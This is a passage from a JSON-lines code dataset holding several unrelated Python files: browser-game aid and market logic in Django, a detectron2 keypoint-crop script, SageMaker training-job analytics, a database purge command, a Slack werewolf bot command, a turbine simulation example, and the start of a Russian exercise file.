Avg\nfrom django.db import transaction\nfrom django.utils import timezone\n\nimport nation.utilities as utils\nimport nation.news as news\nimport nation.variables as v\nfrom nation.forms import ajaxaidform\n\n\n@login_required\ndef incoming(request):\n #takes incoming aid requests in AJAX format\n #checks if sender and recipient are even eligible\n #then we either deny the request or hand control to the appropriate function\n if Nation.objects.actives().filter(Q(pk=request.POST['target'])|Q(user=request.user)).exists():\n return delegate(request)\n return JsonResponse({'result': \"'no'\"})\n\n@transaction.atomic\ndef delegate(request):\n options = {\n 'aid': send_aid,\n 'weapons': give_weapons,\n 'cede': cede,\n 'expedition': expeditionary,\n 'uranium': uranium,\n 'research': research,\n 'nuke': nukes,\n }\n mils = ['nuke', 'weapons', 'expedition']\n if request.POST['action'] in mils:\n Military.objects.select_for_update().filter(Q(nation__user=request.user)|Q(nation__pk=request.POST['target']))\n nation = Nation.objects.select_for_update().get(user=request.user)\n target = Nation.objects.select_for_update().get(pk=request.POST['target'])\n if nation.pk == target.pk:\n return JsonResponse({'result': '\"no\"'})\n if request.POST['action'] in options:\n args = {'nation': nation, 'target': target, 'POST': request.POST}\n result = options[request.POST['action']](**args)\n else:\n result = {'result': 'NO'}\n return JsonResponse(result)\n\n\ndef send_aid(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n POST = kwargs.pop('POST')\n form = ajaxaidform(nation, POST)\n if form.is_valid():\n resource = form.cleaned_data['resource']\n if resource in v.resources:\n aid_amount = form.cleaned_data['amount']\n if nation.outgoing_aidspam.filter(\n reciever=target, \n resource=resource, \n amount=aid_amount, \n timestamp__gte=v.now() - timezone.timedelta(minutes=10)\n ).count() > 5:\n return {'result': 'no'}\n market = Market.objects.latest('pk')\n tariff = 0\n if (nation.economy < 33 and target.economy > 66) or (target.economy < 33 and nation.economy > 66):\n tariff += 10\n if (nation.alignment == 3 and target.alignment == 1) or (target.alignment == 3 and nation.alignment == 1):\n tariff += 10\n if resource != 'budget':\n tariff = aid_amount * tariff\n tb = market.__dict__['%sprice' % resource] * aid_amount\n else:\n tariff = (int(aid_amount * 0.1) if tariff > 0 else 0)\n tb = aid_amount\n nation.__dict__[resource] -= aid_amount\n target.__dict__[resource] += aid_amount\n nation.trade_balance -= tb\n target.trade_balance += tb\n news.aidnews(nation, target, resource, aid_amount)\n #to decrease clutter, merge aidlogs < 10 minutes old\n #so instead of 2x $9999k aid logs, it's 1x $19998k log\n nation.outgoing_aidspam.create(resource= resource, reciever=target, amount=aid_amount)\n result = \"%s has recieved %s!\" % (target.name, v.pretty(aid_amount, resource))\n #feeeeees :D\n uf = [resource, 'trade_balance']\n if tariff > 0:\n result += \" But the differences between our systems resulted in $%sk in tariffs!\" % tariff\n nation.budget -= tariff\n if resource != 'budget':\n uf.append('budget')\n nation.save(update_fields=uf)\n target.save(update_fields=uf)\n log_aid(nation, target, resource, aid_amount)\n result = {'result': result, 'update': True}\n else:\n result = {'result': 'invalid resource'}\n else:\n try:\n result = {'result': form.errors.as_data()['amount'][0][0]}\n except:\n result = {'result': 'invalid resource'}\n return result\n\n\ndef give_weapons(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.military.weapons < 15:\n result = \"We barely have any weapons as it is! We can't give any away!\"\n elif utils.opposing_alignments(nation, target):\n result = \"We cannot give weapons to nations aligned with the %s!\" % v.alignment\n elif nation.military.weapons < 100 and target.military.weapons > 300:\n result = \"Our equipment is worthless compared to what they have!\"\n else:\n nation.military.weapons -= 5\n target.military.weapons += 5\n nation.military.save(update_fields=['weapons'])\n target.military.save(update_fields=['weapons'])\n if nation.has_alliance() and target.has_alliance():\n if nation.alliance == target.alliance and nation.alliance.initiatives.weapontrade:\n pass\n else:\n nation.reputation -= 2\n nation.save(update_fields=['_reputation'])\n news.sending_weapons(nation, target)\n log_aid(nation, target, 'weapons', 5)\n return {'result': \"The weapons are packed in crates and shipped off. The UN didn't seem too happy.\",\n 'update': True,\n }\n return {'result': result}\n\n\ndef cede(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.land < 10100:\n result = \"You do not have enough land to cede!\"\n elif nation.region() != target.region():\n result = \"We cannot cede land to a country in a different part of the world!\"\n elif nation.stability < 20 or nation.approval < 20:\n result = \"The people already hate you! Ceding land might result in your death!\"\n elif nation.econdata.cedes == 3:\n result = \"We can't cede land more than 3 times a month!\"\n else:\n nation.stability -= 10\n nation.approval -= 10\n nation.land -= 100\n nation.save(update_fields=['_stability', '_approval', 'land'])\n target.land += 100\n target.save(update_fields=['land'])\n result = \"We cede the land and lose respect of the people!\"\n news.ceding_territory(nation, target)\n log_aid(nation, target, 'land', 100)\n return {'result': result}\n\n\ndef expeditionary(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.econdata.expedition:\n result = \"You have already sent an expeditionary force this turn!\"\n elif utils.opposing_alignments(nation, target):\n result = \"We cannot send troops to nations aligned with the %s!\" % v.alignment[target.alignment]\n elif nation.military.army < 10:\n result = \"You do not have enough active personnel for this!\"\n else:\n nation.military.army -= 10\n target.military.army += 10\n nation.military.save(update_fields=['army'])\n target.military.save(update_fields=['army'])\n Econdata.objects.filter(nation__pk=nation.pk).update(expedition=True)\n news.aidnews(nation, target, 'troops', 10)\n log_aid(nation, target, 'troops', 10)\n result = \"10k of our active personnel are shipped off to %s\" % target.name\n return {'result': result}\n\n\ndef nukes(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.military.nukes == 0:\n result = \"You have no nukes to send!\"\n else:\n nation.reputation -= 50\n nation.save(update_fields=['_reputation'])\n nation.military.nukes -= 1\n target.military.nukes += 1\n nation.military.save(update_fields=['nukes'])\n target.military.save(update_fields=['nukes'])\n news.nukesent(nation, target)\n log_aid(nation, target, 'nukes', 1)\n result = \"A nuclear bomb is carefully disgused and transported to %s\" % target.name\n return {'result': result}\n\n\ndef research(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.research < 50:\n return {'result': \"stop it\"}\n else:\n nation.research -= 50\n target.research += 50\n nation.save(update_fields=['research'])\n target.save(update_fields=['research'])\n news.aidnews(nation, target, 'research', 50)\n log_aid(nation, target, 'research', 50)\n return {'result': \"50 research gets transferred to %s!\" % target.name, 'update': True}\n\n\ndef uranium(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.uranium < 1:\n result = \"You do not have any uranium!\"\n else:\n nation.uranium -= 1\n nation.reputation -= 5\n target.uranium += 1\n nation.save(update_fields=['uranium', '_reputation'])\n target.save(update_fields=['uranium'])\n news.uraniumaid(nation, target)\n log_aid(nation, target, 'uranium', 1)\n result = \"You send off the yellow cake to %s\" % target.name\n return {'result': result} \n\n\ndef log_aid(nation, target, resource, amount):\n value = get_value(resource, amount)\n query = nation.outgoing_aid.filter(\n resource=resource,\n reciever=target,\n timestamp__gte=v.now() - timezone.timedelta(minutes=10))\n if query.exists():\n query.update(amount=F('amount') + amount, value=F('value') + value)\n else:\n nation.outgoing_aid.create(reciever=target, resource=resource, amount=amount, value=value)\n\n #now for action logging\n query = nation.actionlogs.filter(\n action='Sent aid',\n extra=resource,\n timestamp__gte=v.now() - timezone.timedelta(minutes=10))\n if query.exists():\n query.update(amount=F('amount') + 1)\n else:\n nation.actionlogs.create(action='Sent aid', extra=resource)\n\n\ndef get_value(resource, amount):\n if resource == \"budget\":\n return amount\n if resource == \"land\":\n return amount * 100\n if resource == \"nukes\": \n return 5000*25\n if resource == \"uranium\" or \\\n resource == \"troops\" or \\\n resource == \"research\" or \\\n resource == \"weapons\":\n minimums = {'uranium': 5000, 'troops': 1500, 'research': 400, 'weapons': 500}\n if Marketofferlog.objects.filter(sold=resource).exists():\n value = Marketofferlog.objects.filter(sold=resource)[0:20].aggregate(\n Avg('unitprice'))['unitprice__avg']\n if value < minimums[resource]:\n value = minimums[resource]\n else:\n value = minimums[resource]\n return value * amount\n price = getattr(Market.objects.latest(), \"%sprice\" % resource)\n return price * amount","repo_name":"argiepras/Coco","sub_path":"aid.py","file_name":"aid.py","file_ext":"py","file_size_in_byte":11003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39504037108","text":"import cv2\nimport torch\nimport numpy as np\n\nfrom detectron2.config import get_cfg\nfrom detectron2.data.detection_utils import read_image\nfrom detectron2.engine.defaults import DefaultPredictor\n\ndef detect_parts():\n confidence_threshold = 0.7\n image_path = 't.jpg'\n config_file = '../configs/COCO-Keypoints/keypoint_rcnn_R_50_FPN_3x.yaml'\n opts = ['MODEL.WEIGHTS',\n 'detectron2://COCO-Keypoints/keypoint_rcnn_R_50_FPN_3x/137849621/model_final_a6e10b.pkl',\n 'MODEL.DEVICE', 'cpu']\n cfg = get_cfg()\n cfg.merge_from_file(config_file)\n cfg.merge_from_list(opts)\n cfg.MODEL.RETINANET.SCORE_THRESH_TEST = confidence_threshold\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = confidence_threshold\n cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = confidence_threshold\n cfg.freeze()\n\n img = read_image(image_path, format=\"BGR\")\n image = cv2.imread(image_path)\n\n predictor = DefaultPredictor(cfg)\n predictions = predictor(img)\n\n keypoints = predictions[\"instances\"].pred_keypoints[0]\n for idx, keypoint in enumerate(keypoints):\n # draw keypoint\n x, y, prob = keypoint\n if prob > 0.05:\n if idx == 12:\n startX = x\n startY = y\n if idx == 15:\n endY = y\n if idx == 11:\n endX = x\n\n startX = startX.type(torch.int64)\n startY = startY.type(torch.int64)\n endY = endY.type(torch.int64)\n endX = endX.type(torch.int64)\n crop_img = image[startY:endY, startX - 20:endX + 20]\n cv2.imshow('imagex', crop_img)\n cv2.waitKey(0)\n\ndetect_parts()","repo_name":"mohamedosama27/online-fitting-room","sub_path":"fitting/demo/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"12719214703","text":"from __future__ import annotations\nimport datetime\nimport json\nimport logging\nimport re\nimport shutil\nimport tempfile\nimport time\nfrom collections import Counter\nfrom functools import cached_property, lru_cache\nfrom pathlib import Path\nfrom typing import Any, Callable, cast, Dict, Iterator, List, Tuple, Union\nimport boto3\nimport numpy as np\nfrom botocore.exceptions import ClientError\nfrom .session import default_session\n\n\n# -------------------------------------------------------------------------------------------------\nclass Artifact:\n \"\"\"\n An artifact manages an untarred model artifact of a training job. More\n precisely, it manages a local temporary directory which contains all files\n stored as artifacts.\n\n The artifact ought to be used within a `with` statement. Upon exit, the temporary directory is\n cleaned up.\n\n Attributes:\n path: The path of the artifact's managed directory.\n \"\"\"\n\n def __init__(self, path: Path, cleanup: bool):\n \"\"\"\n Initializes a new artifact in the specified directory.\n\n **Note: Do not call this initializer yourself. It is merely returned when accessing the\n artifacts of a training job.**\n \"\"\"\n self.path = path\n self.cleanup = cleanup\n\n def __enter__(self) -> Artifact:\n return self\n\n def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:\n if self.cleanup:\n shutil.rmtree(self.path)\n\n\n# -------------------------------------------------------------------------------------------------\nclass TrainingJob:\n \"\"\"\n A training job represents a Sagemaker training job within an experiment.\n \"\"\"\n\n def __init__(self, info: Any):\n \"\"\"\n Initializes a new training job, using the specified boto3 session.\n\n **Note: This method should only be called in the context of an Analysis object. Do not use\n this initializer yourself.**\n \"\"\"\n self.info = info\n\n @property\n def name(self) -> str:\n \"\"\"\n Returns the name of the training job.\n \"\"\"\n return self.info[\"TrainingJobName\"]\n\n @property\n def status(self) -> str:\n \"\"\"\n Returns the status of the training job.\n \"\"\"\n return self.info[\"TrainingJobStatus\"]\n\n @property\n def date_created(self) -> datetime.datetime:\n \"\"\"\n Returns the date and time when the training job was created.\n \"\"\"\n return self.info[\"CreationTime\"]\n\n @property\n def hyperparameters(self) -> dict[str, Any]:\n \"\"\"\n Returns all user-defined hyper parameters.\n \"\"\"\n return {\n k: _process_hyperparameter_value(v)\n for k, v in self.info[\"HyperParameters\"].items()\n if not k.startswith(\"sagemaker_\")\n and not k.endswith(\"_output_distribution\")\n }\n\n @lru_cache()\n def pull_logs(self) -> list[str]:\n \"\"\"\n Pulls the training job's logs such that subsequent accesses to the\n `logs` property are noops.\n \"\"\"\n # Check if the logs are already available locally\n log_file = self._cache_dir() / \"logs.txt\"\n if log_file.exists():\n with log_file.open(\"r\") as f:\n return f.read().split(\"\\n\")\n\n # If not, fetch them\n client = default_session().client(\"logs\")\n streams = client.describe_log_streams(\n logGroupName=\"/aws/sagemaker/TrainingJobs\",\n logStreamNamePrefix=self.info[\"TrainingJobName\"],\n )\n res = []\n for stream in streams[\"logStreams\"]:\n params = {\n \"logGroupName\": \"/aws/sagemaker/TrainingJobs\",\n \"logStreamName\": stream[\"logStreamName\"],\n \"startFromHead\": True,\n }\n result = client.get_log_events(**params)\n res.extend([event[\"message\"] for event in result[\"events\"]])\n while \"nextForwardToken\" in result:\n next_token = result[\"nextForwardToken\"]\n result = client.get_log_events(nextToken=next_token, **params)\n if result[\"nextForwardToken\"] == next_token:\n # The same token as before indicates end of stream, see\n # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/logs.html#CloudWatchLogs.Client.get_log_events\n break\n res.extend([event[\"message\"] for event in result[\"events\"]])\n\n # Store them\n log_file.parent.mkdir(parents=True, exist_ok=True)\n with log_file.open(\"w\") as f:\n f.write(\"\\n\".join(res))\n\n # And return them\n return res\n\n @property\n def logs(self) -> list[str]:\n \"\"\"\n Retrieves the logs emitted by this training job.\n \"\"\"\n # We can't put the `pull_logs` code here directly since `cached_property` seems to be CPU-\n # bound for some odd reason.\n return self.pull_logs()\n\n @cached_property\n def metrics(self) -> dict[str, np.ndarray]:\n \"\"\"\n Fetches the metrics defined by the training script from the training\n job's logs.\n\n For each metric, it returns a 1D NumPy array (ordered chronologically).\n \"\"\"\n # Check if the logs are already available locally\n metrics_file = self._cache_dir() / \"metrics.json\"\n if metrics_file.exists():\n with metrics_file.open(\"r\") as f:\n return {\n k: np.array(v, dtype=np.float32)\n for k, v in json.load(f).items()\n }\n\n # If not, get them from the logs, write them to the file system and return\n metrics = {\n metric[\"Name\"]: [\n float(x)\n for x in re.findall(metric[\"Regex\"], \"\\n\".join(self.logs))\n ]\n for metric in self.info[\"AlgorithmSpecification\"][\n \"MetricDefinitions\"\n ]\n }\n with metrics_file.open(\"w+\") as f:\n json.dump(metrics, f)\n\n # Return them as numpy arrays\n return {k: np.array(v, dtype=np.float32) for k, v in metrics.items()}\n\n def artifact(self, cache: bool = True) -> Artifact:\n \"\"\"\n Retrieves the model artifact from S3 and stores it locally in a\n temporary directory.\n\n Args:\n cache: Whether to cache the extracted artifact.\n\n Returns:\n The artifact which contains the untarred model artifact directory. The artifact should\n be wrapped in a `with` statement such that the directory is cleaned up after usage.\n \"\"\"\n cache_dir = self._cache_dir() / \"artifacts\"\n\n # First, we check whether the model is already available locally. For this, the `cache`\n # flag is irrelevant\n if cache_dir.exists():\n return Artifact(cache_dir, cleanup=False)\n\n # If not, we need to download the artifact. For that, we need to get the bucket and object\n # path\n regex = r\"^s3://([A-z0-9-_]*)/(.*)$\"\n bucket_name, object_path = re.findall(\n regex, self.info[\"ModelArtifacts\"][\"S3ModelArtifacts\"]\n )[0]\n\n # Then, we can download the model\n s3 = default_session().client(\"s3\")\n with tempfile.NamedTemporaryFile(suffix=\".tar.gz\") as tmp:\n s3.download_fileobj(bucket_name, object_path, tmp)\n tmp.seek(0)\n # As soon as it is downloaded, we can unpack the tar into the cache directory or a\n # temporary one\n if cache:\n cache_dir.mkdir(exist_ok=True, parents=True)\n target = cache_dir\n else:\n target = Path(tempfile.mkdtemp())\n shutil.unpack_archive(tmp.name, target)\n\n # And return the artifact\n return Artifact(target, cleanup=not cache)\n\n def move_to(self, experiment: str) -> None:\n \"\"\"\n Updates the experiment tag to the provided name.\n \"\"\"\n client = default_session().client(\"sagemaker\")\n client.add_tags(\n ResourceArn=self.info[\"TrainingJobArn\"],\n Tags=[{\"Key\": \"Experiment\", \"Value\": experiment}],\n )\n\n def delete(self) -> None:\n \"\"\"\n Deletes the training job by removing all tags associated with it.\n \"\"\"\n client = default_session().client(\"sagemaker\")\n\n existing_tags = client.list_tags(\n ResourceArn=self.info[\"TrainingJobArn\"],\n MaxResults=100,\n )\n experiment = [\n t[\"Value\"]\n for t in existing_tags[\"Tags\"]\n if t[\"Key\"] == \"Experiment\"\n ][0]\n\n client.add_tags(\n ResourceArn=self.info[\"TrainingJobArn\"],\n Tags=[{\"Key\": \"OriginalExperiment\", \"Value\": experiment}],\n )\n\n client.delete_tags(\n ResourceArn=self.info[\"TrainingJobArn\"],\n TagKeys=[\"Experiment\"],\n )\n\n def __repr__(self) -> str:\n return f\"TrainingJob(name={self.info['TrainingJobName']})\"\n\n def _cache_dir(self) -> Path:\n return (\n Path.home()\n / \"tsbench\"\n / \"cache\"\n / cast(str, self.info[\"TrainingJobName\"])\n )\n\n\n# -------------------------------------------------------------------------------------------------\nclass Analysis:\n \"\"\"\n The analysis object allows analyzing a set of training jobs that belong to\n the same experiment.\n \"\"\"\n\n def __init__(\n self,\n experiment: str,\n only_completed: bool = True,\n include: Callable[[TrainingJob], bool] = lambda _: True,\n resolve_duplicates: bool = True,\n ):\n \"\"\"\n Initializes a new analysis object, using the specified session to make\n requests to AWS and Sagemaker. The initializer already fetches all\n training jobs belonging to the provided experiment.\n\n Args:\n session: The session to interact with AWS services.\n experiment: The name of the experiment to analyze.\n only_completed: Whether to ignore runs which have not completed successfully (a\n warning will be emitted nonetheless).\n include: Whether the training job should be included in the summary. By default, it\n returns True for any job. If `only_completed` is set to True, only completed jobs\n will be passed to this callback.\n resolve_duplicates: Whether to exclude the older experiments if experiments with the\n same hyperparameters are found.\n \"\"\"\n self.experiment_name = experiment\n training_jobs, duplicates = _fetch_training_jobs(\n default_session(),\n self.experiment_name,\n only_completed,\n resolve_duplicates,\n )\n self.duplicates = duplicates\n self.map = {t.name: t for t in training_jobs if include(t)}\n if len(self.map) < len(training_jobs):\n logging.warning(\n \" Analysis manually excludes %d jobs\",\n len(training_jobs) - len(self.map),\n )\n\n def get(self, name: str) -> TrainingJob:\n \"\"\"\n Returns the training job with the specified name.\n \"\"\"\n return self.map[name]\n\n @property\n def status(self) -> dict[str, int]:\n \"\"\"\n Returns the aggregate statistics about the status of all jobs.\n \"\"\"\n c = Counter([t.status for t in self.map.values()])\n return dict(c)\n\n def __iter__(self) -> Iterator[TrainingJob]:\n return iter(self.map.values())\n\n def __len__(self) -> int:\n return len(self.map)\n\n def __repr__(self) -> str:\n return (\n f\"Analysis(experiment='{self.experiment_name}',\"\n f\" num_jobs={len(self):,})\"\n )\n\n\n# -------------------------------------------------------------------------------------------------\ndef _fetch_training_jobs(\n session: boto3.Session,\n experiment: str,\n only_completed: bool,\n resolve_duplicates: bool,\n) -> tuple[list[TrainingJob], list[TrainingJob]]:\n \"\"\"\n Fetches all training jobs which are associated with this experiment.\n \"\"\"\n client = session.client(\"sagemaker\")\n search_params = {\n \"MaxResults\": 100,\n \"Resource\": \"TrainingJob\",\n \"SearchExpression\": {\n \"Filters\": [\n {\n \"Name\": \"Tags.Experiment\",\n \"Operator\": \"Equals\",\n \"Value\": experiment,\n }\n ],\n },\n }\n\n while True:\n try:\n response = client.search(**search_params)\n break\n except ClientError:\n time.sleep(1)\n\n results = response[\"Results\"]\n while \"NextToken\" in response:\n while True:\n try:\n response = client.search(\n NextToken=response[\"NextToken\"], **search_params\n )\n results.extend(response[\"Results\"])\n break\n except ClientError:\n time.sleep(1)\n\n jobs = [TrainingJob(r[\"TrainingJob\"]) for r in results]\n\n if only_completed:\n completed_jobs = [j for j in jobs if j.status == \"Completed\"]\n if len(completed_jobs) < len(jobs):\n c = Counter([j.status for j in jobs])\n d = dict(c)\n del d[\"Completed\"]\n logging.warning(\n \" Analysis is ignoring %d jobs %s\",\n len(jobs) - len(completed_jobs),\n d,\n )\n jobs = completed_jobs\n\n duplicates = []\n if resolve_duplicates:\n unique = {}\n for job in jobs:\n hyperparameters = frozenset(job.hyperparameters.items())\n if hyperparameters in unique:\n # Replace existing job if this one is newer. Don't do anything otherwise.\n if unique[hyperparameters].date_created < job.date_created:\n duplicates.append(unique[hyperparameters])\n unique[hyperparameters] = job\n else:\n duplicates.append(job)\n else:\n unique[hyperparameters] = job\n\n if len(unique) < len(jobs):\n logging.warning(\n \" Analysis is ignoring %d superseded jobs\",\n len(jobs) - len(unique),\n )\n jobs = list(unique.values())\n\n return jobs, duplicates\n\n\n# -------------------------------------------------------------------------------------------------\ndef _process_hyperparameter_value(v: str) -> str | float | int | bool:\n if re.match(r'^\"(.*)\"$', v): # value is a string\n return v[1:-1]\n if v in (\"false\", \"False\", \"true\", \"True\"):\n return v in (\"true\", \"True\")\n if \".\" in v: # value is float\n return float(v)\n return int(v) # value is int\n","repo_name":"awslabs/gluonts","sub_path":"src/gluonts/nursery/tsbench/src/tsbench/evaluations/aws/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":14899,"program_lang":"python","lang":"en","doc_type":"code","stars":3904,"dataset":"github-code","pt":"67"} +{"seq_id":"29374190985","text":"from collections import Counter\nfrom django.core.management.base import BaseCommand\n# from django.core.management.base import CommandError\n\nfrom library.models import Artist\nfrom library.models import Album\nfrom library.models import Track\nfrom library.models import MediaFile\nfrom library.models import Artwork\n\n\nclass Command(BaseCommand):\n help = 'Empty metadata'\n\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **kwargs):\n self.stdout.write('deleting everything (except your music)')\n\n results = []\n results.append(Artist.objects.all().delete())\n results.append(Album.objects.all().delete())\n results.append(Track.objects.all().delete())\n results.append(MediaFile.objects.all().delete())\n results.append(Artwork.objects.all().delete())\n\n counter = Counter()\n for c in [Counter(r[1]) for r in results]:\n counter.update(c)\n\n longest_value = 1\n if counter.values():\n longest_value = len(str(max(counter.values())))\n\n for k in counter.keys():\n self.stdout.write(' {} {} {}'.format(\n self.style.ERROR('destroyed'),\n str(counter[k]).rjust(longest_value, ' '),\n k,\n ))\n","repo_name":"jordanribera/maru","sub_path":"api/src/library/management/commands/purge.py","file_name":"purge.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"19847779404","text":"import logging\nfrom ..text import Text\nfrom ..roles import WEREWOLF\nfrom .base import BaseCommand, match_agent\n\nLOG = logging.getLogger(__name__)\n\n\nclass SeerCommand(BaseCommand):\n def welcome(self, srv=None, game=None, role=None):\n srv.broadcast(channel=role.channel,\n text=Text(\"At night, you may chose someone to SCRY in your private channel.\\n\"\n \"You will determine if that person is a werewolf.\\n\"\n \"Evil humans are not detected.\"))\n\n def on_message(self, srv=None, game=None, role=None, channel=None, text=None):\n LOG.debug(\"SeerCommand examines: game=%s, role=%s, channel=%s, text=%s\", game, role, channel, text)\n if channel != role.channel:\n return\n\n scry = text.match(\"scry\", match_agent(game.players, any_agent=True))\n if scry is not None:\n target = scry[0]\n if not self.is_relevant(game=game):\n srv.broadcast(channel=channel, text=Text(\"You may not currently scry.\"))\n return True\n if target not in game.players:\n srv.broadcast(channel=channel, text=Text(target, \" isn't a valid scrying target.\"))\n return True\n srv.broadcast(channel=channel, text=Text(\"You chose to scry \", target))\n game.scratchpad.phase_actions.scry[role] = game.roles[target]\n return True\n\n def ready(self, srv=None, game=None):\n if game.current_phase.get('can_vote', False):\n return\n game.scratchpad.phase_actions.scry = {}\n\n def resolve(self, srv=None, game=None):\n if game.current_phase.get('can_vote', False):\n return\n\n for role, target in game.scratchpad.phase_actions.scry.items():\n if target is not None:\n if target.role.name == WEREWOLF:\n srv.broadcast(channel=role.channel,\n text=Text(\"During the night you scry \", target.player, \".\\n\",\n \"They are a werewolf!\"))\n else:\n srv.broadcast(channel=role.channel,\n text=Text(\"During the night you scry \", target.player, \".\\n\",\n \"They are not a werewolf.\"))\n","repo_name":"jan-g/slackwolf","sub_path":"werewolf/commands/seer.py","file_name":"seer.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40787635097","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri 11 May 2012\n\nTest response of rigid turbine structure to applied forces on an elastic\nfoundation, defined by a stiffness matrix.\n\n@author: Rick Lupton\n\"\"\"\n\nfrom __future__ import division\n\nimport numpy as np\nfrom numpy import pi, array, dot\nimport matplotlib.pylab as plt\nimport matplotlib.gridspec as gridspec\n\nimport dynamics\nfrom turbine import Turbine\n\n# Options\ndynamics.OPT_GRAVITY = True\ndynamics.OPT_GEOMETRIC_STIFFNESS = False\n\n# Create model\nbladed_file = r'C:\\Users\\Rick Lupton\\Dropbox\\phd\\Bladed\\Models\\OC3-Hywind_SparBuoy_NREL5MW.prj'\ntb = Turbine(bladed_file, rigid=False)\n\n# Set base motion\ntb.system.free(tb.base)\ntb.system.prescribe(tb.base, acc=0, vel=0, part=[0,1,2,3,5])\n\n# Define foundation matrix - no coupling for now\n# Choose to match appropriate frequencies of rigid-body motion (Karimirad & Moan, 2012)\n# in surge, sway, heave, roll, pitch yaw respectively\nrigid_body_freqs = array([0.05, 0.05, 0.20, 0.22, 0.22, 0.84]) **2\nfoundation = np.diag([\n tb.mass * rigid_body_freqs[0],\n tb.mass * rigid_body_freqs[1],\n tb.mass * rigid_body_freqs[2],\n tb.inertia[0,0] * rigid_body_freqs[3],\n tb.inertia[1,1] * rigid_body_freqs[4],\n tb.inertia[2,2] * rigid_body_freqs[5] + 100\n])\ntb.base.stiffness = foundation*1000\n\n# Parameters\nrotor_speed = 2\nt = np.arange(0, 90, 0.25)\n\n# Linearise model and make MBC version\n#lin = tb.lin(az0=0, rotor_speed=rotor_speed, init=False)\n#mbclin = lin.multiblade_transform((0, rotor_speed), [range(0,4),range(4,8),range(8,12)])\n\n# Set initial pitch deflection and simulate\nz0 = np.zeros(13)\nz0[0] = 0.3\n#yl = lin.integrate(t, z0)\n#ym = mbclin.integrate(t, z0)\n\n# Simulate original full system\ntb.base_motion = 4\ntb.base_motion_amp = 0.3\ntt,y = tb.simulate(t1=90, dt=0.25, rotor_speed=rotor_speed, init=False)\n\n\ndef mbc(az, u):\n N = len(az)\n B = array([\n np.ones((3,N)),\n [2*np.cos(az), 2*np.cos(az+2*pi/3), 2*np.cos(az+4*pi/3)],\n [2*np.sin(az), 2*np.sin(az+2*pi/3), 2*np.sin(az+4*pi/3)],\n ]) / 3\n u = array(u)\n z = np.einsum('zbt,btj->jzt', B, u)\n return z\n\ndef p(parts=False):\n fig = plt.figure()\n fig.set_size_inches(15,10,forward=True)\n gs = gridspec.GridSpec(4, 1)\n \n az = y[1][:,0]\n z = mbc(az, y[2:5])\n \n ax = None\n for imode in range(4):\n ax = fig.add_subplot(gs[imode,0], sharex=ax)\n ax.plot(t,y[2][:,imode],'k',alpha=0.8)\n ax.plot(t,y[3][:,imode],'k',alpha=0.4)\n ax.plot(t,y[4][:,imode],'k',alpha=0.2)\n ax.plot(t,z[imode].T)\n for i in np.nonzero(np.diff(az) < 0)[0]:\n ax.axvline(t[i], alpha=0.1)\n ax.axhline(0, alpha=0.1) \n ax.set_title(tb.modes.mode_descriptions[imode])\n #ax1.legend(frameon=False, loc='upper left')\n #plt.setp(ax1.get_legend().get_texts(), fontsize='small')\n \n ax.set_xlabel('Time / s')\n \n","repo_name":"ricklupton/mbwind","sub_path":"examples/forced-base-motion/test-turbine-foundation.py","file_name":"test-turbine-foundation.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"19826840437","text":"from django import template\nfrom django.utils.safestring import mark_safe\nimport nation.variables as v\n\nregister = template.Library()\n\ndef align(text, nation):\n if nation.alignment == 1:\n toreturn = 'ussr.png'\n elif nation.alignment == 2:\n toreturn = 'neutral.png'\n else:\n toreturn = 'us.png'\n return mark_safe(text + toreturn)\n\nregister.filter('align', align)\n\n\ndef offerdisplay(offer):\n if nation.alignment == 1:\n toreturn = 'ussr.png'\n elif nation.alignment == 2:\n toreturn = 'neutral.png'\n else:\n toreturn = 'us.png'\n return mark_safe(text + toreturn)\n\nregister.filter('offerdisplay', offerdisplay)\n\n\ndef tariff(offer, player):\n return offer.tariff * offer.request_amount\n\nregister.filter('tariff', tariff)\n\n\ndef offerformat(amount, offertype):\n return mark_safe(v.pretty(amount, offertype, True))\n\nregister.filter('offerformat', offerformat)","repo_name":"argiepras/Coco","sub_path":"templatetags/markettags.py","file_name":"markettags.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20608573205","text":"import msvcrt\nimport math\nimport sympy\nimport random\n\n\n# ---------------------------------------------------------------------\n\nprint('\\n1. Вычислите число c заданной точностью d.\\nПример:' +\n '\\nпри d = 0.001, π = 3.141\\n10^{-1} ≤ d ≤ 10^{-10}' +\n '\\nРешение:')\n\nd = input()\naccur = len(d)\nprint(str(math.pi)[0:accur])\n\n\n# ---------------------------------------------------------------------\n\n\nprint('\\n2. Задайте натуральное число N. Напишите программу, которая ' +\n 'составит список простых множителей числа N.' +\n '\\nРешение:')\n\nn = int(input())\nsome_list = []\nfor i in range(1, n + 1):\n if n % i == 0:\n for j in range(2, i // 2 + 1):\n if i % j == 0:\n break\n else:\n some_list.append(i)\nprint(*some_list, sep=', 